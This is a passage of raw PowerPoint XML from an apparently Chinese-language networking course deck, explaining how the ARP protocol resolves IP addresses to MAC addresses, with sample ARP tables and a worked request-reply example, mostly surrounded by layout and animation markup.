          </a:ln>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000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Internet Address     	 Physical Address               Type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>  202.196.53.254            00-e0-4c-de-04-26          dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>  202.196.53.57         	08-00-46-60-8d-3a          dynamic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22945513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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="5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2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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="5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62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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="962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25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6259">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="962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62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6259">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="962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62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6259">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="962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2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6259">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9625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25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6259">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9625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62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5"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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据包发送过程来看</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包时，发送方判断目标是否在同一网段（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> &amp;network mask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）（局域网内还是外）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）同一网段（局域网）：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存，是否有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表项，有则直接发送</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>b. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无，广播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP Request&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>谁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，报告位置（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>c. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机收到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，回应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（包含自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），更新自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表，添加或更新发送方的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip,mac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>d. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送方接收</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，获取目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，并添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表项，否则传输失败（找不到目的主机）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）不同网段，发送给网关，同样查找网关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238594" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>工作过程</a:t>
            </a:r>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pPr/>
              <a:t>124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3437925063"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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A670CA-9CE3-4941-BB72-9CCB289DC1B9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>125</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8196" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址解析协议工作示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="256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10"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5611"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5612"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3"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4" name="Straight Connector 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3801269" y="3886994"/>
            <a:ext cx="425450" cy="531812"/>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5"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6"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5617"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8"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9"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0"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1"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2"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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25623" name="Oval Callout 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="3284538"/>
            <a:ext cx="2449512" cy="649287"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22750"/>
              <a:gd name="adj2" fmla="val 114958"/>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谁是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.102</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25624" name="Oval Callout 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4211638" y="4365625"/>
            <a:ext cx="865187" cy="503238"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87866"/>
              <a:gd name="adj2" fmla="val 26579"/>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我是</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="25626" name="Table 41"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209168030"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2860675"/>
          <a:ext cx="3348038" cy="1936749"/>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87081">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192.168.1.1</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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                          <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>:00:01</a:t>
                      </a:r>
                      <a:endPar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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="387753">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r h="387081">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192.168.1.102</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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                          <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>:00:A2</a:t>
                      </a:r>
                      <a:endPar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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="387753">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192.168.1.103</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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                          <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>:00:A3</a:t>
                      </a:r>
                      <a:endPar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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="387081">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192.168.1.104</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:00:A4</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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25646" name="Explosion 2 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="4365625"/>
            <a:ext cx="719138"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7" name="Explosion 2 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4019550"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8" name="Explosion 2 50"/>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9" name="Explosion 2 51"/>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0" name="Explosion 2 52"/>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1"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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="33" name="Table 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBFFFB8E-FB27-402C-A396-71B897779FCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4214715154"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2266950" y="5899951"/>
          <a:ext cx="3348038" cy="35153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5153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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Table 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{939C57A9-20D8-4BA3-B1C3-5FFE8CD6627C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1803696292"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3529012" y="1099199"/>
          <a:ext cx="3348038" cy="35153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5153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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="35" name="Table 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AB3EE7E-1348-40AE-AFBC-F6F0D45DCE80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1984054010"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5665787" y="5899951"/>
          <a:ext cx="3348038" cy="35153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5153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anchor="ctr"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4720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5605"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25605"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25604"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25604"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25609"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25609"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25612"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25612"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25610"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25610"/>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25613"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25613"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
